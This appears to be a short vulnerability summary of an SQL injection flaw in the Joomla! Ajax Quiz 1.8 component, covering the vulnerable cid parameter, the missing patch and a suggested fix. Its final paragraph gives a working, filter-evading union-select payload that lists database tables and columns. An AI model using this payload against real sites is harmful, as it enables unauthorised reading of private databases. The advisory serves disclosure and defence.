Joomla! Component Ajax Quiz 1.8 SQL Injection

An unauthenticated attacker sends a crafted GET request to the Joomla! index.php endpoint, supplying `option=com_ajaxquiz`, `view=ajaxquiz`, and a malicious `cid` parameter containing SQL injection payloads [ref_id=1]. The `cid` value is directly concatenated into SQL queries without sanitization, enabling arbitrary SQL commands to be executed against the database.

The advisory [ref_id=1] identifies the `index.php` entry point with `option=com_ajaxquiz` and `view=ajaxquiz` parameters, and the `cid` GET parameter as the injection vector. No specific source file or function is named in the bundle.

No patch is included in the bundle. The advisory [ref_id=1] does not provide remediation details; the vendor (Webkul) would need to add input validation or parameterized queries for the `cid` parameter in the Ajax Quiz component to prevent SQL injection.

Send a GET request to `http://localhost/[PATH]/index.php?option=com_ajaxquiz&view=ajaxquiz&cid=[SQL]` where `[SQL]` is replaced with a malicious payload such as `60+union+select+(/*!00000SeLect*/(@x)/*!00000fRom*/(/*!00000select*/(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(/*!00000select*/(0)/*!00000from*/(information_schema.columns)/*!00000where*/(table_schema=database())and(0x00)in(@x:=/*!00000CoNcaT*/(@x,0x3c62723e,if((@tbl!=table_name),/*!00000CoNcaT*/(0x3c2f6469763e,LPAD(@running_number:=@running_number+1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),0x00),lpad(@z:=@z+1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x)--+-` [ref_id=1].